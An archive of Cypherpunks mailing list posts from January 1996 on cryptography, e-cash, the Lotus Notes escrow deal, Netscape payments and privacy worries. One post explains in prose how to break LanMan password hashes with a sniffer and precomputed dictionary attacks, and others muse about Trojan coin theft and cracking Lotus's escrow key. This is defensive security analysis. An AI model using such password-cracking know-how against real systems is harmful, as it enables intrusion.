with miles of aisles, and wonder how I ever got educated in an era when a
"big" bookstore was a Brentano's that would now fit in just the _magazine_
section of a Borders or Bookstar or Barnes and Noble. (Hmmmmh, attack of
the killer Bs?).

The answer is that in-depth study of ideas hasn't changed much. The
Tofflerian idea of "overchoice" is solvable by simply ignoring the
ephemeral cruft that threatens to engulf us.

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 22 Jan 96 09:01:07 PST
To: cypherpunks@toad.com
Subject: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.Bill.
Message-ID: <v02120d17ad296f1e1a73@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- --- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: e$@thumper.vmeng.com
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 22 Jan 1996 10:37:28 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the
Melting of Mr. Bill.

I thought I'd crank this out in light of Friday's NewsHour segment about
Apple and the path-dependency of the microcomputer market.


Contrary to what PBS would have us believe, ;-), the concept of path
dependency in technology, and in economics, for that matter, is a proven
fallacy.

At the risk of sounding credentialist (*I'm* not an economist, either), the
NewsHour's Mr. Solman seems to be proof that journalism isn't economics, no
matter the journalist's academic credentials. Journalists have to get a
story out, and sometimes there's no story in the actual economics of a
situation. Certainly there's no story in the non-existance of path
dependency.


The most famous example of path dependency, the idea that our previous
economic choices doom us to repeat those choices forever, is the QWERTY
keyboard, which has been proven *not* to be significantly slower than the
Dvorak keyboard, its supposedly more efficient alternative. Dvorak, the
designer of the alternative keyboard, was also the same person who
conducted the "ergonomic" studies (spending our WWII tax dollars, I might
add) "proving" it's efficacy, and elevated his keyboard to the status of an
urban legend. Dvorak was at worst a fraud and at best deluded with his own
grandeur. Reviews of Dvorak's own data show some significant flaws in both
research methdology and data handling. In addition, several independent
studies since then have shown that randomly selected beginning typists,
starting out on one keyboard or the other, have *never* shown any
significant difference in typing speed.

The Betamax/VHS videocassete war, another example of path dependence, was
more one of Sony not having an open standard than anything else. Sony
played dog-in-the-manger with it's own technology, and consequently ended
up owning the most lucrative market on a profit-per-machine basis, the one
in television broadcasting. It also means they were leaving big money on
the table where the largest market was, in consumer electronics. Doesn't
this sound familiar to Mac fans?

Path dependence had nothing to do with it. Consumer Reports did comparisons
at the time showing only a marginal difference between Betamax and JVC, and
nowadays there is absolutely no percievable difference between the two.

I now challenge anyone (including, unfortunately, Apple's own
*psychologist*, quoted in the NewsHour piece) to *prove* path-dependence in
the current market "hegemony" of Microsoft on the desktop. It ain't so. The
reason that Microsoft has business computer market dominance today is *not*
because of it's original *perceived* incompatibility with legacy mainframe
equipment ("nobody ever got fired for buying IBM -- or Microsoft").
Technically, mainframe compatibility was a non-issue at the time. It
certainly wasn't for the first 5 years of the Mac's life, anyway. Apple
could have done something about the mainframe compatibility issue with
simple marketing communications if they had paid any attention to it at
all.

Apple's heart was never in the business market. First of all, for all their
lip service to business, they really weren't ever attracted to the idea of
building better word-processing and spreadsheet boxes, even if they did
have the best one, before Excel and Word moved to Windows, at the time of
the big ramp up of the business microcomputer market.  It showed in their
attitude to most business people. Outside consultants and mavericks were
always the heroes in Apple's commercials, and so outside consultants and
mavericks were attracted to the Mac as a computing platform, but large
businesses and conformists weren't.  When compatibility with mainframes
actually did become an issue, for the short time when people were
offloading their mainframe data onto LANs, Apple didn't want to be there
anyway. With the advent of LANs, Apple didn't build the technology to deal
with LANs head on on their own turf, large corporations. Apple built
peer-to-peer networks of collegial desktop machines. Unfortunately, they
never paid attention to the bandwidth or the multitasking premia necessary
for those networks to function properly from the high-volume user's point
of view, and, so, when someone downloaded a file from your machine, and you
printed something in the background at the same time, you suffered a
performance hit if you tried to do anything else. Your mouse jerked around
the screen, or your words wouldn't show up in a window as fast as you typed
them. With PC file and print servers, this was less of a problem, because
those two jobs were offloaded to a seperate machine, whose job it was to do
nothing but run a printer, or to serve files. Since everyone had to be
connected to these servers the local area network, or LAN, was born. On
Apple networks, every machine is potentially a server for everyone else,
and everyone is their own print server. Only after PC LANs became
ubiquitous did Apple ever build servers of their own. Again, their hearts
weren't in it, because they were more interested in the possiblities of
more distributed, collegial, peer-to-peer networks. Fortunately, the first
problem, network bandwidth, has been solved, because almost all Macs now
come with ethernet, while the second problem, preemptive multitasking on
faster processors, is being solved slowly. This is all very good for Apple,
because peer-to-peer architecture is where the world's going to go anyway.
The whole internet is a peer-to-peer, "geodesic" network, where each
machine is optimized for it's own particular function, be it serving, or
switching information. There is no central repository of anything. That has
been Apple's view of networks since day one.


If it's any consolation, we won't even need LANs to do business with,
anyway.  A couple months ago, I saw Netscape running in the bond trading
room of this country's largest institutional trustee bank, of all places.
In their case, Netscape beat Powerbuilder hands-down in a prototype
development shootout. The prototype *was* the production version.  Netscape
can do anything from secure outside-the-firewall SQL calls to actually
conducting cash commerce. Game over. By the way, Netscape is not special in
this regard at all. So can any other sufficiently secure browser server
combination. Either one, client or server, can be developed for a dime a
dozen even now. This is especially true when compound document
architectures come on-line, like Apple's Cyberdog, an internet
implementation of their OpenDoc software object technology.

The reason we won't need LANs is because the only real difference between a
LAN and the internet is a firewall for security, and the need for clients
to speak Novell's TCP/IP-incompatible proprietary network protocol.  With
internet-level encryption protocols like the IETF IPSEC standard, you won't
even need a firewall anymore.  The only people who can establish a server
session with *any* machine connected to the net will be those issuing the
digital signatures authorized to access that machine, no matter where those
people are physically. When that happens, networks will need to be as
public as possible, which means, of course, TCP/IP, and not Netware. It's
like Heinlein's old joke about space, "once you're in Earth orbit, you're
halfway to anywhere". So, once you've gotten *rid* of the firewall, you're
everywhere.  So much for the path dependence of the LAN market.

What happens to the information concentrated behind those firewalls  -- or
proprietary software markets, for that matter --  when, because of strong
cryptography, firewalls disappear? Remember what happened to those floating
globs of grease in the detergent commercial? Surfacted away into little
tiny bits. I can hear Bill Gates now: "I'm melting!, I'm melting!". Ding,
dong, Mr. Bill is dead... Game over. Now you see why he's fighting so hard
to be net-compatible all of the sudden.

In this "decade of the internet", the [user interface, platform, desktop,
LAN, whatever] is meat, and real life is on the net, to paraphrase William
Gibson.


For the time being, I have come to the conclusion that the Mac, at least as
long as Apple makes most of them, is the computer for the "best of us",
and, unfortunately, not "the rest of us". I've learned to live with that. I
no more worry about Apple's prospects than I do about Porsche's.  I expect
that Apple management, like Herr Doktor Porsche, is just waking up to the
fact that even though they designed the Volkswagen, they can't possibly
mass produce them efficiently at a decent enough profit to advance the
state of the art, which is really where their hearts have been all along.
Sooner or later, Apple will go back to cranking out 917s, to demonstrate
the power of the technology, 911s, for a more affordable version of that
power, and 928s, for those of us who only want to look the part. ;-).
Fortunately, there are lots of companies, like Power Computing, to produce
those Volkswagens for those of us who can't afford Porches, and "Macintosh"
won't mean just "Apple" anymore.


So, for developers, and for me, a fully-credentialled Mac Bigot and
camp-follower, the future for Apple means Cyberdog, because Cyberdog means
breaking down large "glops" of information and software "grease" and
surfacting them, fractally, into little bitty bits out into the net, where
*all machines*, not just dumb Java-terminals, can use them better. It also
means developing cryptographically strong internet-level security, so that
anyone can talk to any machine from anywhere if they have permission to do
so, and *nobody* with out permission can either get in or see what those
authorized people are doing, with a packet sniffer, or worse, with a
key-cracker. It means building into all network applications the ability to
do digital commerce. That is, the ability to handle digital bearer
certificates, like Digicash's ecash, and the ability to handle
micropayments, like the MicroMint protocol or it's successor technologies.
Imagine if your code could send you money in the mail, or if a router did
real-time load balancing by changing it's micropayment
price-per-thru-packet when traffic got too high or too low. The future of
the net's going to be a strange place, indeed.


Until that happens, I suppose Porsche parts is still a lucrative business,
as long as developers keep in mind what business they're really in.


Cheers,
Bob Hettinga

- --------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
- -------------------------------------------------

- --- end forwarded text


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQO/sPgyLN8bw6ZVAQGuSgP/fkKrI6aTSmPIGOu+LOxRzO5Ptt7QZNxh
48+b7975jIfUMgovphKBWdWtO+jGMCyUWxUVqjVbN8nmwfLT1RZFckOdLK0iM4nD
Fgl5+s9yoI0OllHS+oOMcAIyuLIkzazUgtQojm8qBFGSGulW0Keq2dIRNsThGLrk
Kk7K3oGMrQs=
=71fv
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 22 Jan 96 03:10:18 PST
To: cypherpunks@toad.com
Subject: Ultimate Paranoia
Message-ID: <199601221110.MAA08368@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Fellow Cypherpunks,

I have been lurking around for some time and I have learned alot, But I have
a few questions that I either haven't seen posted or I've missed all together.

I keep PGP stored on a removable hard drive and keep it under lock and
key when it's not in use.  I write and encrypt messages on a stand-alone
computer,
that I only have access to. My passphrase is rather long and full of gibberish,
But I still fear the other things that I can not control.

Does anyone make and sell a device that emits white and pink noise?

How do you take the randomness collected from radation sensors to create
a truly random sample for creating a PGP key?

Is there anything else that I might be missing besides lining the walls &
computer 
in tin foil?   :^) 

Thanks for your help!

-Murphy

-- 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: p.ruhnau@jinxed.dinoco.de
Date: Mon, 22 Jan 96 10:26:06 PST
To: cypherpunks@toad.com
Subject: Re: Hassles taking App. Crypt. to Taiwan?
Message-ID: <n-bd9blnb@p.ruhnau.jinxed.nl>
MIME-Version: 1.0
Content-Type: text/plain




On 21 Jan 96, TCMAY@GOT.NET wrote:

> On the Taiwan side, though, they may wonder why you brought an
> expensive
> U.S.-printed copy when you get the special rice-paper edition of "Applied
> Cryptography, 2nd Ed." for the equivalent of $2.25 in Taipei's book stalls.

Can anybody tell me the addresses of taiwanese mail-order bookstores,
please?

MfG,
Peter

-- 
#define putc(c,fp)      (--(fp)->_pc<0 ? (*(fp)->_pt)(c,fp) : (*(fp)->_cp++=c))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jan 96 12:58:16 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Netscape + Verifone
In-Reply-To: <199601221912.OAA07923@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960122125346.6718A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jan 1996, Perry E. Metzger wrote:
> 
>    REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
>    Inc. will devise a system to make electronic payments on the internet
>    more secure.
> 
> Anyone know anything about this? I'm away from my normal sources of
> such things (like Bloomberg terminals)...

The first I heard of this was when John Young posted the cite this 
morning <sigh>. Maybe he can find out which cubicle they're going to be 
moving me to :-/

The full text of the press release is available at

http://www.eit.com/people/announcements/012296.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 22 Jan 96 13:17:55 PST
To: cypherpunks@toad.com
Subject: Re: More thoughts about digital postage (was Re: Digital postage and remailerabuse)
Message-ID: <v02120d02ad29a7151230@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:42 1/22/96, Alan Bostick wrote:

>People asked in earlier in this thread how remailers could issue digital
>postage stamps without being able to know who is using which stamp issued.
>
>One obvious approach is to use blind signatures.

Sure. That is the obvious approach. It also is, IMHO, by far the best. One
minor problem is that the blind signature technology has been patented by
its inventor, David Chaum the ower of DigiCash. You can't just write your
own implementation. You also don't need to. Just use DigiCash's Ecash for
postage. There is some work being done on a new MIME based remailer
standard that would allow this to happen. At this time, the big problem
seems to be keeping the message size constant between hops.

See the remailer-operators list for the current discussion.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 22 Jan 96 13:18:39 PST
To: bryce@colorado.edu
Subject: Re: DigiCash Ecash - 2 security topics
Message-ID: <v02120d05ad29aca26002@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 1/22/96, Bryce wrote:

>What kind of performance hit does this new encryption entail?
>(No additional performance hit if SSL does it, I know.)

Very little.

>Are you considering having different protocols for SSL-protected
>transactions versus unprotected ones?

It isn't just an issue of SSL vs. unprotected. The new Ecash API that
DigiCash is jointly designing with developers, will support two basic
levels of operation. The first is similar to today's Ecash software. The
client handles the transport. The second just generates the messages. Your
application is responsible for getting them to where they should go.
Presumably securely.

>Let me repeat something I said a couple of weeks ago:  I suspect
>that the weakest point in DigiCash security is on the end-user's
>own harddrive.  A malicious cracker could write a Trojan horse
>or even a virus which would steal the user's coins and send them
>to himself.

Given the amounts likely to be found on a drive, I doubt it would be worth
the effort.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Mon, 22 Jan 96 10:51:25 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
In-Reply-To: <199601221601.IAA14610@mailx.best.com>
Message-ID: <199601221851.NAA16938@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601221601.IAA14610@mailx.best.com> "James A. Donald" <jamesd@echeque.com> writes:

> From: "James A. Donald" <jamesd@echeque.com>
> Date: Mon, 22 Jan 1996 19:56:43 -0800
> X-From-Line: jamesd@echeque.com  Mon Jan 22 10:59:02 1996
> X-Sender: jamesd@best.com
> X-Mailer: Windows Eudora Version 2.1
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Lines: 32
> 
> At 02:00 AM 1/22/96 -0500, David Mazieres wrote:
> >Failing that, can anyone suggest other secure, preferably unpatented,
> >shared-key encryption algorithms that could encrypt at ethernet speeds
> >(1 MByte/sec) without using most of the CPU on a fast Pentium or
> >equivalent processor?
> 
> RC4 is of course unpatented and faster than anything else.
> Of course the name RC4 is trademarked, so you could simply 
> call it "the well known algorithm" in your documentation 
> and give the algorithm explicitly.

The problem with RC4 is that it works in OFB only.  If I need data
integrity in the face of known plaintext, I will need to compute a MAC
in paralell with the encryption which could significantly slow things
down.  With a block cypher in CFB, I can just re-encrypt the last
block of data.

That said, OFB has the advantage that I can overlap computation of the
RC4 stream with I/O, which might be a win for me.  Are there any MACs
significantly faster than say ~50 cycles per byte?

Thanks,
David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 22 Jan 96 11:13:09 PST
To: cypherpunks@toad.com
Subject: Netscape + Verifone
Message-ID: <199601221912.OAA07923@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



My pager delivers me selected miniaturized Reuters news stories.

I just got one that reads:

   REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
   Inc. will devise a system to make electronic payments on the internet
   more secure.

Anyone know anything about this? I'm away from my normal sources of
such things (like Bloomberg terminals)...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Mon, 22 Jan 96 12:39:54 PST
To: cypherpunks@toad.com
Subject: Re: Ultimate Paranoia
Message-ID: <2.2.32.19960122203914.002e0108@isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 PM 1/22/96 +0100, Anonymous wrote:
>Fellow Cypherpunks,
>
>I have been lurking around for some time and I have learned alot, But I have
>a few questions that I either haven't seen posted or I've missed all together.
>
>I keep PGP stored on a removable hard drive and keep it under lock and
>key when it's not in use.  I write and encrypt messages on a stand-alone
>computer,
>that I only have access to. My passphrase is rather long and full of gibberish,
>But I still fear the other things that I can not control.
>
>Does anyone make and sell a device that emits white and pink noise?
>
>How do you take the randomness collected from radation sensors to create
>a truly random sample for creating a PGP key?
>
>Is there anything else that I might be missing besides lining the walls &
>computer 
>in tin foil?   :^) 
>
>Thanks for your help!
>
>-Murphy
>
>-- 

 There is a windows sond package that will generate brown, pink and white
noise.  The package is called Cool Edit.  The currrent version is 1.52 and
is available
from :

        http://www.netzone.com/syntrillium/

Hope this helps.

Lou Z.
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBLJocAAAEEAMlDzYJPYq0pvfMuSiKU0Y65L2nJql+qEJHYGjO5Pys4prDw
YW1ooPWaqrPQAy/eyqrM7I9KNFDCtmaPxtgcPw2oEDfc/w6cPkrVzvovKLfHQvtg
V/hHUekptSf6j525omrVAoM9MxVL3sEGCjn9VrTeC3h9upkfntHOJeL88i2NAAUR
tB5Mb3UgWmlya28gPHppcmtvbEBkYXRhdGVrLmNvbT4=
=Qlxm
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@isr.umd.edu>
Date: Mon, 22 Jan 96 11:51:44 PST
To: cypherpunks@toad.com
Subject: Lotus key breaking?
Message-ID: <199601221950.OAA21605@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hmmm...how long is the single private key of Lotus Notes?  Is it time to
warm up the key-cracking net again?

VTW Billwatch #33 said that:
 
>LOTUS BLINKS IN INDUSTRY/NSA CRYPT STANDOFF
...
>On Wed, Jan. 17th, 1996, Lotus announced that it had increased the key
>length of its International version of the Lotus Notes product to 64
>bits.  They did this by building in a back door for the Administration to
>use to decrypt any international traffic that it might desire to read.

>Although there are a lot of reasons why we think this is a terrible idea,
>the first one that springs to mind is the fact that the one public key that
>Lotus has embedded in all their software is a single point of failure
>for every International Lotus user throughout the world.
...
>You can find a copy of the Lotus press releases at
>http://www.lotus.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Mon, 22 Jan 96 11:55:40 PST
To: perry@piermont.com
Subject: Re: Netscape + Verifone
In-Reply-To: <199601221912.OAA07923@jekyll.piermont.com>
Message-ID: <9601221954.AA11984@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon Jan 22, 1996, Perry E. Metzger wrote:

>    REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
>    Inc. will devise a system to make electronic payments on the internet
>    more secure.
> 
> Anyone know anything about this?

Reported in today's Wall Street Journal

  http://update.wsj.com/update/edit/w-netsca.html

Basically Verifone's credit card processing technology
(credit card verification) will be bundled with Netscape's
Commerce server.

Netscape also announced that the software will use new
encryption technology being developed by MasterCard and
Visa.  I don't know what this quote means:

  That technology would break sensitive information like
  credit-card data into 1,024 bits of information, instead
  of the 128 bits used currently, theoretically making it
  much more difficult to steal. 

Howard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Mon, 22 Jan 96 13:05:15 PST
To: herbs@connobj.com (Herb Sutter)
Subject: Re: The Lotus Position
In-Reply-To: <2.2.32.19960122012052.006d87c0@mail.interlog.com>
Message-ID: <3103fbba05e7002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter said:
> In answer to a question from the floor, Ozzie did say that yes, the
> agreement reached with the NSA was scalable -- IOW, that you could use
> 128-bit keys and give the government 88 of them, instead of 64-and-give-24
> -- but in retrospect I wonder whether keeping Notes at 64 bits was a
> condition of the NSA deal.  I'm not normally a conspiracy theorist, but
> considering that Ray was clearly aware that the 64-bitness was going to
> raise eyebrows and still somehow didn't get around to simply strengthening
> it...  well, it makes you wonder.

Not really. I think the governments position has been 64 bits with
escrow. I doubt that they'd actually ship a 128 bit version with
88 bits escrowed, as I believe the government has stated in the
past that they don't want to give away the store even with escrow.

-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Mon, 22 Jan 96 12:15:21 PST
To: cypherpunks@toad.com
Subject: Crypto comedy
Message-ID: <v01530501ad299924dcb6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


During some free time over the holidays, I finally got around to HTML-izing
a bunch of articles I've had published over the years.  These are among the
most riotously funny things ever written.

However, one of these pieces may be of particular interest to cypherpunks,
as it revolves around cryptography.  Be warned that the piece has no
scientific merit whatsoever, and even misuses some archaic crypto terms.  I
was aware of it at the time, but I knew that 99.9% of people would never
notice.  (This was six years ago, long before cryptography became hip.)

The piece is called "Ching Chow's Hidden Agenda."  (Ching Chow was a comic
that used to appear in the New York Daily News.)

That's: http://www.wfmu.org/~davem (choose the "Some things I've written"
option).

There's some other interesting stuff on my web pages as well, with equally
little scientific merit.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 22 Jan 96 16:32:00 PST
To: cypherpunks@toad.com
Subject: [Fwd: Re: Netscape + Verifone]
Message-ID: <31042B07.5664@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain

Howard Melman wrote:
> 
> On Mon Jan 22, 1996, Perry E. Metzger wrote:
> 
> >    REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
> >    Inc. will devise a system to make electronic payments on the internet
> >    more secure.
> >
> > Anyone know anything about this?
> 
> Reported in today's Wall Street Journal
> 
>   http://update.wsj.com/update/edit/w-netsca.html
> 
> Basically Verifone's credit card processing technology
> (credit card verification) will be bundled with Netscape's
> Commerce server.
> 
> Netscape also announced that the software will use new
> encryption technology being developed by MasterCard and
> Visa.  I don't know what this quote means:
> 
>   That technology would break sensitive information like
>   credit-card data into 1,024 bits of information, instead
>   of the 128 bits used currently, theoretically making it
>   much more difficult to steal.

  This is typical "the reporter doesn't understand the difference
between RSA and symetric cipher key sizes" reporting.  What it
really boils down to is that export software can use larger key
sizes for certain application specific encryption.  For example
if you limit what is being encrypted to fixed length financial
information such as credit card numbers and ammounts you can
use keys larger than 40 bits.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.


Subject: Re: Netscape + Verifone
From: melman@osf.org (Howard Melman)
Date: 22 Jan 1996 12:05:53 -0800
Approved: usenet@netscape.com
Newsgroups: mcom.list.cypherpunks
Organization: Local Mail/News Gateway
References: <199601221912.OAA07923@jekyll.piermont.com>
Sender: daemon@tera.mcom.com


On Mon Jan 22, 1996, Perry E. Metzger wrote:

>    REDWOOD CITY, CA - Netscape Communications Corp. and Verifone
>    Inc. will devise a system to make electronic payments on the internet
>    more secure.
> 
> Anyone know anything about this?

Reported in today's Wall Street Journal

  http://update.wsj.com/update/edit/w-netsca.html

Basically Verifone's credit card processing technology
(credit card verification) will be bundled with Netscape's
Commerce server.

Netscape also announced that the software will use new
encryption technology being developed by MasterCard and
Visa.  I don't know what this quote means:

  That technology would break sensitive information like
  credit-card data into 1,024 bits of information, instead
  of the 128 bits used currently, theoretically making it
  much more difficult to steal. 

Howard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jan 96 17:01:56 PST
To: Rick Smith <cypherpunks@toad.com
Subject: Re: NSA vacuuming down Internet traffic
Message-ID: <m0teWZ3-0008zMC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:07 AM 1/22/96 -0600, Rick Smith wrote:

>My first job, twenty years ago, involved a prototype speech
>recognition system under contract for Rome Air Development Center (a
>traditional cover for TLA research). The machine was supposed to go
>beep whenever a specified word or phrase was heard over the input
>voice stream. We joked about testing for the term "Russian Spy" but
>settled on looking for "Kissinger" instead. That let us run tests by
>listening to news broadcasts of the time. We built custom boards with
>Schottky TTL and a blazing fast 120ns cycle time. Times change, eh?
>
>Rick.
>smith@sctc.com            secure computing corporation

Don't tell me, let me guess:  20 years ago, if you had told anyone about
this project, you would have had to kill them.  Now, 20 years later, after a
few levels of re-classifications and de-classifications, all you have to do
is to sneer in our general direction.  <G>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Seng <jseng@stf.org.sg>
Date: Mon, 22 Jan 96 00:34:44 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Hassles taking App. Crypt. to Taiwan?
In-Reply-To: <199601220740.XAA07983@ix4.ix.netcom.com>
Message-ID: <Pine.BSD/.3.91.960122163832.12867A-100000@fire.stf.org.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jan 1996, Bill Stewart wrote:
> If this were Singapore, they might consider it subversive literature,
> because it is :-)  Don't know about Taiwan; you can tell them it's a computer
> textbook or math textbook if they ask any questions.  Rice-paper editions
> of books are especially good if you need to eat them in a hurry when the
> Feds are raiding you....

Just to clearify. I havent heard of any Cyptography book been ban or 
listed as 'subversive literature' in Singapore. Where did you hear that 
from? *8)

*cheer*

-James Seng 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ng Pheng Siong <ngps@cbn.com.sg>
Date: Mon, 22 Jan 96 01:19:57 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Hassles taking App. Crypt. to Taiwan?
In-Reply-To: <199601220740.XAA07983@ix4.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960122171001.27853A-100000@cbn.cbn.com.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jan 1996, Bill Stewart wrote:
> If this were Singapore, they might consider it subversive literature,
> because it is :-)  

Duh! Bought my 1st edition in a prominent local bookstore, which had only 
2 copies left. (Or maybe they only carried 2 copies. ;) Am waiting
for the 2nd edition to arrive. Or may just order it myself.


- PS
--
Ng Pheng Siong <ngps@pacific.net.sg>
NetCentre Pte Ltd * Singapore

Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 22 Jan 96 14:35:57 PST
To: cypherpunks@toad.com
Subject: Re: Ultimate Paranoia
In-Reply-To: <199601221110.MAA08368@utopia.hacktic.nl>
Message-ID: <9601222235.AA13397@w20-575-75.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


For the ultimately paranoid:
	Don't forget to keep all sensitive info on your standalone
machine on an encrypted filesystem.  You never know who might show up
with guns and a search warrant.  But this is truly paranoid.

-James

******************************
"Even paranoids have enemies."
	-Unknown
******************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@beijing.CS.Berkeley.EDU (David A Wagner)
Date: Mon, 22 Jan 96 15:08:34 PST
To: cypherpunks@toad.com
Subject: Re: Lan Manager security
Message-ID: <199601222305.SAA11398@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9601221620.AA11356@capybara.transarc.com>,
 <lws@transarc.com> wrote:
     [ ... the LanMan / Samba(?) password authentication protocol ... ]
> The password is uppercased and truncated to 14 bytes (or padded to 14 
> bytes with nulls).  This is split (0..6,7..13) into two DES keys 
> which are each used to encrypt a static 8-byte value. The resulting 
> 16 byte key is stored at the server. 
     [...]
> To authenticate a connection, the server issues an 8 byte random challenge.
     [...]
> The client then pads the 16-byte key to 21 bytes (with zeros, natch), 
> splits it in thirds, {0..6}, {7..13}, {14,15,NUL,NUL,NUL,NUL,NUL}, 
> uses each third to DES-encrypt the challenge, concatenates the 
> ciphertexts, and returns the response to the server.

Oh yeah, this protocol again.  I remember looking at it a while ago; many
thanks to Andy Brown <a.brown@nexor.co.uk>, who showed it to me and kindly
gave me lots of information.

It's pretty crappy, IMHO.  It's very weak against dictionary attacks
(assuming I have a sniffer).

For instance, if you use a password which is less than 12-14 characters
long, it will be very easy to recover bytes 7..13 of your password.
After that, it will often be simple enough to extend the password backwards
if it is based on a dictionary word; even if the password is purely random,
this reduces the strength of the password to an effective length of 7 bytes.

Also, there is no salt used in the password hashing function, so precomputed
dictionary attacks are easy (e.g. the "Exabyte attack", where you precompute
the hash of each likely password and store each result on a huge tape.)

